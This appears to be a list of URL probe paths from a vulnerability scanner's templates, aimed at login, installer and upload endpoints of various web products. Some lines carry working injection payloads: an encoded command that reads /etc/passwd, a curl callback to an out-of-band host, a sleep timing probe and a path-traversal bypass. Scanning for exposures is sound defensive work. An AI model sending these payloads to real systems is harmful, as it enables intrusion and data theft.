
/dana-na/auth/url_default/welcome.cgi
/filemanager/upload.php
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/wp-json/visualizer/v1/upload-data
/installer/index.php
/roundcube/installer/index.php
/configWizard/keyUpload.jsp
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
/{{route}}
/WebInterface
/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}
/WebInterface/{{dirname}}/{{filename}}
/login?redir=/ng
/mftp/
/
/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
/user/City_ajax.aspx?CityId=33
/tool/log/c.php?strip_slashes=md5&host={{randstr}}
/seeyon/thirdpartyController.do.css/..;/ajax.do
/defaultroot/officeserverservlet
/console/login/LoginForm.jsp
